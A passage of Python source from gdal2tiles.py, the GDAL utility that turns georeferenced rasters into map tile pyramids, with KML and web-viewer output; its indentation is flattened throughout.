if options and options.verbose:
print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(warped_vrt_dataset.GetMetadata("xml:VRT")[0])
return warped_vrt_dataset
def nb_data_bands(dataset):
"""
Return the number of data (non-alpha) bands of a gdal dataset
"""
alphaband = dataset.GetRasterBand(1).GetMaskBand()
if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or
dataset.RasterCount == 4 or
dataset.RasterCount == 2):
return dataset.RasterCount - 1
return dataset.RasterCount
def create_base_tile(tile_job_info, tile_detail, queue=None):
dataBandsCount = tile_job_info.nb_data_bands
output = tile_job_info.output_file_path
tileext = tile_job_info.tile_extension
tile_size = tile_job_info.tile_size
options = tile_job_info.options
tilebands = dataBandsCount + 1
cached_ds = getattr(threadLocal, 'cached_ds', None)
if cached_ds and cached_ds.GetDescription() == tile_job_info.src_file:
ds = cached_ds
else:
ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
threadLocal.cached_ds = ds
mem_drv = gdal.GetDriverByName('MEM')
out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
alphaband = ds.GetRasterBand(1).GetMaskBand()
tx = tile_detail.tx
ty = tile_detail.ty
tz = tile_detail.tz
rx = tile_detail.rx
ry = tile_detail.ry
rxsize = tile_detail.rxsize
rysize = tile_detail.rysize
wx = tile_detail.wx
wy = tile_detail.wy
wxsize = tile_detail.wxsize
wysize = tile_detail.wysize
querysize = tile_detail.querysize
# Tile dataset in memory
tilefilename = os.path.join(
output, str(tz), str(tx), "%s.%s" % (ty, tileext))
dstile = mem_drv.Create('', tile_size, tile_size, tilebands)
data = alpha = None
if options.verbose:
print("\tReadRaster Extent: ",
(rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# Query is in 'nearest neighbour' but can be bigger in then the tile_size
# We scale down the query to the tile_size by supplied algorithm.
if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)
# Detect totally transparent tile and skip its creation
if tile_job_info.exclude_transparent and len(alpha) == alpha.count('\x00'.encode('ascii')):
return
data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
band_list=list(range(1, dataBandsCount + 1)))
# The tile in memory is a transparent file by default. Write pixel values into it if
# any
if data:
if tile_size == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
# Note: For source drivers based on WaveLet compression (JPEG2000, ECW,
# MrSID) the ReadRaster function returns high-quality raster (not ugly
# nearest neighbour)
# TODO: Use directly 'near' for WaveLet files
else:
# Big ReadRaster query in memory scaled to the tile_size - all but 'near'
# algo
dsquery = mem_drv.Create('', querysize, querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now
# only png tiles are supported)
dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
tilefilename=tilefilename)
del dsquery
del data
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_drv.CreateCopy(tilefilename, dstile, strict=0)
del dstile
# Create a KML file for this tile.
if tile_job_info.kml:
kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty)
if not options.resume or not os.path.exists(kmlfilename):
with open(kmlfilename, 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), tile_job_info.options
).encode('utf-8'))
if queue:
queue.put("tile %s %s %s" % (tx, ty, tz))
def create_overview_tiles(tile_job_info, output_folder, options):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
mem_driver = gdal.GetDriverByName('MEM')
tile_driver = tile_job_info.tile_driver
out_driver = gdal.GetDriverByName(tile_driver)
tilebands = tile_job_info.nb_data_bands + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
tcount = 0
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
if tcount == 0:
return
if not options.quiet:
print("Generating Overview Tiles:")
progress_bar = ProgressBar(tcount)
progress_bar.start()
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
tilefilename = os.path.join(output_folder,
str(tz),
str(tx),
"%s.%s" % (ty, tile_job_info.tile_extension))
if options.verbose:
print(ti, '/', tcount, tilefilename)
if options.resume and os.path.exists(tilefilename):
if options.verbose:
print("Tile generation skipped because of --resume")
else:
progress_bar.log_progress()
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
2 * tile_job_info.tile_size, tilebands)
# TODO: fill the null value
dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y <= maxy:
base_tile_path = os.path.join(output_folder, str(tz + 1), str(x),
"%s.%s" % (y, tile_job_info.tile_extension))
if not os.path.isfile(base_tile_path):
continue
dsquerytile = gdal.Open(
base_tile_path,
gdal.GA_ReadOnly)
if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0):
tileposy = 0
else:
tileposy = tile_job_info.tile_size
if tx:
tileposx = x % (2 * tx) * tile_job_info.tile_size
elif tx == 0 and x == 1:
tileposx = tile_job_info.tile_size
else:
tileposx = 0
dsquery.WriteRaster(
tileposx, tileposy, tile_job_info.tile_size,
tile_job_info.tile_size,
dsquerytile.ReadRaster(0, 0,
tile_job_info.tile_size,
tile_job_info.tile_size),
band_list=list(range(1, tilebands + 1)))
children.append([x, y, tz + 1])
if children:
scale_query_to_tile(dsquery, dstile, tile_driver, options,
tilefilename=tilefilename)
# Write a copy of tile to png/jpg
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_driver.CreateCopy(tilefilename, dstile, strict=0)
if options.verbose:
print("\tbuild from zoom", tz + 1,
" tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))
# Create a KML file for this tile.
if tile_job_info.kml:
with open(os.path.join(
output_folder,
'%d/%d/%d.kml' % (tz, tx, ty)
), 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), options, children
).encode('utf-8'))
if not options.verbose and not options.quiet:
progress_bar.log_progress()
def optparse_init():
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = "Usage: %prog [options] input_file [output]"
p = OptionParser(usage, version="%prog " + __version__)
p.add_option("-p", "--profile", dest='profile',
type='choice', choices=profile_list,
help=("Tile cutting profile (%s) - default 'mercator' "
"(Google Maps compatible)" % ",".join(profile_list)))
p.add_option("-r", "--resampling", dest="resampling",
type='choice', choices=resampling_list,
help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS",
help="The spatial reference system used for the source input data")
p.add_option('-z', '--zoom', dest="zoom",
help="Zoom levels to render (format:'2-5' or '10').")
p.add_option('-e', '--resume', dest="resume", action="store_true",
help="Resume mode. Generate only missing files.")
p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA",
help="NODATA transparency value to assign to the input data")
p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true",
help=("When using the geodetic profile, specifies the base resolution "
"as 0.703125 or 2 tiles at zoom level 0."))
p.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Print status messages to stdout")
p.add_option("-x", "--exclude",
action="store_true", dest="exclude_transparent",
help="Exclude transparent tiles from result tileset")
p.add_option("-q", "--quiet",
action="store_true", dest="quiet",
help="Disable messages and status to stdout")
p.add_option("--processes",
dest="nb_processes",
type='int',
help="Number of processes to use for tiling")
# KML options
g = OptionGroup(p, "KML (Google Earth) options",
"Options for generated Google Earth SuperOverlay metadata")
g.add_option("-k", "--force-kml", dest='kml', action="store_true",
help=("Generate KML for Google Earth - default for 'geodetic' profile and "
"'raster' in EPSG:4326. For a dataset with different projection use "
"with caution!"))
g.add_option("-n", "--no-kml", dest='kml', action="store_false",
help="Avoid automatic generation of KML files for EPSG:4326")
g.add_option("-u", "--url", dest='url',
help="URL address where the generated tiles are going to be published")
p.add_option_group(g)
# HTML options
g = OptionGroup(p, "Web viewer options",
"Options for generated HTML viewers a la Google Maps")
g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
g.add_option("-t", "--title", dest='title',
help="Title of the map")
g.add_option("-c", "--copyright", dest='copyright',
help="Copyright for the map")
g.add_option("-g", "--googlekey", dest='googlekey',
help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
g.add_option("-b", "--bingkey", dest='bingkey',
help="Bing Maps API key from https://www.bingmapsportal.com/")
p.add_option_group(g)
p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
webviewer='all', copyright='', resampling='average', resume=False,
googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
processes=1)
return p
def process_args(argv):
parser = optparse_init()
options, args = parser.parse_args(args=argv)
# Args should be either an input file OR an input file and an output folder
if not args:
exit_with_error("You need to specify at least an input file as argument to the script")
if len(args) > 2:
exit_with_error("Processing of several input files is not supported.",
"Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
"files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args))
input_file = args[0]
if not os.path.isfile(input_file):
exit_with_error("The provided input file %s does not exist or is not a file" % input_file)
if len(args) == 2:
output_folder = args[1]
else:
# Directory with input filename without extension in actual directory
output_folder = os.path.splitext(os.path.basename(input_file))[0]
options = options_post_processing(options, input_file, output_folder)
return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
if not options.title:
options.title = os.path.basename(input_file)
if options.url and not options.url.endswith('/'):
options.url += '/'
if options.url:
out_path = output_folder
if out_path.endswith("/"):
out_path = out_path[:-1]
options.url += os.path.basename(out_path) + '/'
# Supported options
if options.resampling == 'antialias' and not numpy_available:
exit_with_error("'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy.")
try:
os.path.basename(input_file).encode('ascii')
except UnicodeEncodeError:
full_ascii = False
else:
full_ascii = True
# LC_CTYPE check
if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
if not options.quiet:
print("\nWARNING: "
"You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
"not UTF-8 compatible, and your input file contains non-ascii characters. "
"The generated sample googlemaps, openlayers or "
"leaflet files might contain some invalid characters as a result\n")
# Output the results
if options.verbose:
print("Options:", options)
print("Input:", input_file)
print("Output:", output_folder)
print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
print('')
return options
class TileDetail(object):
tx = 0
ty = 0
tz = 0
rx = 0
ry = 0
rxsize = 0
rysize = 0
wx = 0
wy = 0
wxsize = 0
wysize = 0
querysize = 0
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __str__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __repr__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
class TileJobInfo(object):
"""
Plain object to hold tile job configuration for a dataset
"""
src_file = ""
nb_data_bands = 0
output_file_path = ""
tile_extension = ""
tile_size = 0
tile_driver = None
kml = False
tminmax = []
tminz = 0
tmaxz = 0
in_srs_wkt = 0
out_geo_trans = []
ominy = 0
is_epsg_4326 = False
options = None
exclude_transparent = False
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __str__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __repr__(self):
return "TileJobInfo %s\n" % (self.src_file)
class Gdal2TilesError(Exception):
pass
class GDAL2Tiles(object):
def __init__(self, input_file, output_folder, options):
"""Constructor function - initialization"""
self.out_drv = None
self.mem_drv = None
self.warped_input_dataset = None
self.out_srs = None
self.nativezoom = None
self.tminmax = None
self.tsize = None
self.mercator = None
self.geodetic = None
self.alphaband = None
self.dataBandsCount = None
self.out_gt = None
self.tileswne = None
self.swne = None
self.ominx = None
self.omaxx = None
self.omaxy = None
self.ominy = None
self.input_file = None
self.output_folder = None
self.isepsg4326 = None
self.in_srs_wkt = None
# Tile format
self.tile_size = 256
self.tiledriver = 'PNG'
self.tileext = 'png'
self.tmp_dir = tempfile.mkdtemp()
self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')
# Should we read bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
# How big should be query window be for scaling down
# Later on reset according the chosen resampling algorightm
self.querysize = 4 * self.tile_size
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
self.input_file = input_file
self.output_folder = output_folder
self.options = options
if self.options.resampling == 'near':
self.querysize = self.tile_size
elif self.options.resampling == 'bilinear':
self.querysize = self.tile_size * 2
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
zoom_min, zoom_max = minmax[:2]
self.tminz = int(zoom_min)
if zoom_max:
self.tmaxz = int(zoom_max)
else:
self.tmaxz = int(zoom_min)
# KML generation
self.kml = self.options.kml
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.AllRegister()
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?" %
self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")
# Open the input file
if self.input_file:
input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
else:
raise Exception("No input file was specified")
if self.options.verbose:
print("Input file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
if not input_dataset:
# Note: GDAL prints the ERROR message too
exit_with_error("It is not possible to open the input file '%s'." % self.input_file)
# Read metadata from the input file
if input_dataset.RasterCount == 0:
exit_with_error("Input file '%s' has no raster band" % self.input_file)
if input_dataset.GetRasterBand(1).GetRasterColorTable():
exit_with_error(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
"From paletted file you can create RGBA file (temp.vrt) by:\n"
"gdal_translate -of vrt -expand rgba %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
in_nodata = setup_no_data_values(input_dataset, self.options)
if self.options.verbose:
print("Preprocessed file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)
self.out_srs = setup_output_srs(in_srs, self.options)
# If input and output reference systems are different, we reproject the input dataset into
# the output reference system for easier manipulation
self.warped_input_dataset = None
if self.options.profile in ('mercator', 'geodetic'):
if not in_srs:
exit_with_error(
"Input file has unknown SRS.",
"Use --s_srs ESPG:xyz (or similar) to provide source reference system.")
if not has_georeference(input_dataset):
exit_with_error(
"There is no georeference - neither affine transformation (worldfile) "
"nor GCPs. You can generate only 'raster' profile tiles.",
"Either gdal2tiles with parameter -p 'raster' or use another GIS "
"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
)
if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
(input_dataset.GetGCPCount() != 0)):
self.warped_input_dataset = reproject_dataset(
input_dataset, in_srs, self.out_srs)
if in_nodata:
self.warped_input_dataset = update_no_data_values(
self.warped_input_dataset, in_nodata, options=self.options)
else:
self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
self.warped_input_dataset, options=self.options)
if self.warped_input_dataset and self.options.verbose:
print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize,
self.warped_input_dataset.RasterCount))
if not self.warped_input_dataset:
self.warped_input_dataset = input_dataset
self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename,
self.warped_input_dataset)
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
self.dataBandsCount = nb_data_bands(self.warped_input_dataset)
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print("KML autotest OK!")
# Read the georeference
self.out_gt = self.warped_input_dataset.GetGeoTransform()
# Test the size of the pixel
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
exit_with_error("Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first.")
# Here we expect: pixel is square, no rotation on the raster
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15
if self.options.verbose:
print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)
# Calculating ranges for tiles in different zoom levels
if self.options.profile == 'mercator':
self.mercator = GlobalMercator()
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.mercator.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):",
self.mercator.MetersToLatLon(self.ominx, self.ominy),
self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:",
self.tmaxz,
"(",
self.mercator.Resolution(self.tmaxz),
")")
if self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tminz is None:
self.tminz = self.geodetic.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)
if self.options.profile == 'raster':
def log2(x):
return math.log10(x) / math.log10(2)
self.nativezoom = int(
max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tile_size))),
math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tile_size)))))
if self.options.verbose:
print("Native zoom of the raster:", self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz is None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz + 1))
self.tsize = list(range(0, self.tmaxz + 1))
for tz in range(0, self.tmaxz + 1):
tsize = 2.0**(self.nativezoom - tz) * self.tile_size
tminx, tminy = 0, 0
tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level
west = self.out_gt[0] + x * self.tile_size * pixelsizex
east = west + self.tile_size * pixelsizex
south = self.ominy + y * self.tile_size * pixelsizex
north = south + self.tile_size * pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa
def generate_metadata(self):
"""
Generation of main metadata files and HTML viewers (metadata related to particular
tiles are generated during the tile processing).
"""
if not os.path.exists(self.output_folder):
os.makedirs(self.output_folder)
if self.options.profile == 'mercator':
south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
south, west = max(-85.05112878, south), max(-180.0, west)
north, east = min(85.05112878, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
f.write(self.generate_googlemaps().encode('utf-8'))
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate leaflet.html
if self.options.webviewer in ('all', 'leaflet'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
f.write(self.generate_leaflet().encode('utf-8'))
elif self.options.profile == 'geodetic':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
south, west = max(-90.0, south), max(-180.0, west)
north, east = min(90.0, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
elif self.options.profile == 'raster':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate tilemapresource.xml.
if not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml')):
with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
f.write(self.generate_tilemapresource().encode('utf-8'))
if self.kml:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
f.write(generate_kml(
None, None, None, self.tileext, self.tile_size, self.tileswne,
self.options, children
).encode('utf-8'))
def generate_base_tiles(self):
"""
Generation of the base tiles (the lowest in the pyramid) directly from the input raster
"""
if not self.options.quiet:
print("Generating Base Tiles:")
if self.options.verbose:
print('')
print("Tiles generated from the max zoom level:")
print("----------------------------------------")
print('')
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
ds = self.warped_input_dataset
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print("dataBandsCount: ", self.dataBandsCount)
print("tilebands: ", tilebands)
tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
tile_details = []
tz = self.tmaxz
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
tilefilename = os.path.join(
self.output_folder, str(tz), str(tx), "%s.%s" % (ty, self.tileext))
if self.options.verbose:
print(ti, '/', tcount, tilefilename)
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print("Tile generation skipped because of --resume")
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:3857
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
# Don't scale up by nearest neighbour, better change the querysize
# to the native resolution (and return smaller query tile) for scaling
if self.options.profile in ('mercator', 'geodetic'):
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])
# Pixel size in the raster covering query geo extent
nativesize = wb[0] + wb[2]
if self.options.verbose:
print("\tNative Extent (querysize", nativesize, "): ", rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)
rx, ry, rxsize, rysize = rb
wx, wy, wxsize, wysize = wb
else: # 'raster' profile:
tsize = int(self.tsize[tz]) # tile_size in raster coordinates for actual zoom
xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels
ysize = self.warped_input_dataset.RasterYSize
if tz >= self.nativezoom:
querysize = self.tile_size
rx = (tx) * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
ry = ysize - (ty * tsize) - rysize
wx, wy = 0, 0
wxsize = int(rxsize / float(tsize) * self.tile_size)
wysize = int(rysize / float(tsize) * self.tile_size)
if wysize != self.tile_size:
wy = self.tile_size - wysize
# Read the source raster if anything is going inside the tile as per the computed
# geo_query
tile_details.append(
TileDetail(
tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
)
)
conf = TileJobInfo(
src_file=self.tmp_vrt_filename,
nb_data_bands=self.dataBandsCount,
output_file_path=self.output_folder,
tile_extension=self.tileext,
tile_driver=self.tiledriver,
tile_size=self.tile_size,
kml=self.kml,
tminmax=self.tminmax,
tminz=self.tminz,
tmaxz=self.tmaxz,
in_srs_wkt=self.in_srs_wkt,
out_geo_trans=self.out_gt,
ominy=self.ominy,
is_epsg_4326=self.isepsg4326,
options=self.options,
exclude_transparent=self.options.exclude_transparent,
)
return conf, tile_details
def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0):
"""
For given dataset and query in cartographic coordinates returns parameters for ReadRaster()
in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the
